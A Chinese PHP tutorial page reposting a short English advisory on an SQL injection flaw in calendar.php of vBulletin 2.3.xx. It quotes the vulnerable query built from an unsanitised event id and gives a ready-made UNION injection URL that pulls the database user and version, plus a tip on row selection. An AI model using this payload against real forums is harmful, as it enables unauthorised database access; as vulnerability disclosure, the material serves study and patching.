当前位置: 首页 > 图文教程 > 网络编程 > PHP > vBulletin Forum 2.3.xx SQL Injection

PHP
PHP获取网卡地址的代码
生成卡号php代码
PHP循环获取GET和POST值的代码
php实现的在线人员函数库
也谈php网站在线人数统计
php下使用以下代码连接并测试
PHP程序员编程注意事项
Smarty安装配置方法
php5 mysql分页实例代码
php设计模式介绍之值对象模式
修改Zend引擎实现PHP源码加密的原理及实践
php zend解密软件绿色版测试可用
snoopy PHP版的网络客户端提供本地下载
mysql 中InnoDB和MyISAM的区别分析小结
Snoopy类使用小例子
学php必收藏的几个经典代码
php采集速度探究总结(原创)
Mysql中limit的用法方法详解与注意事项
PHP下用rmdir实现删除目录的三种方法小结
Gregarius中文日期格式问题解决办法

PHP 中的 vBulletin Forum 2.3.xx SQL Injection


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 291 ::
收藏到网摘: n/a


vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.
-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------
If the MySQL version is greater than 4.00, a UNION attack could be used.
-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------
The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.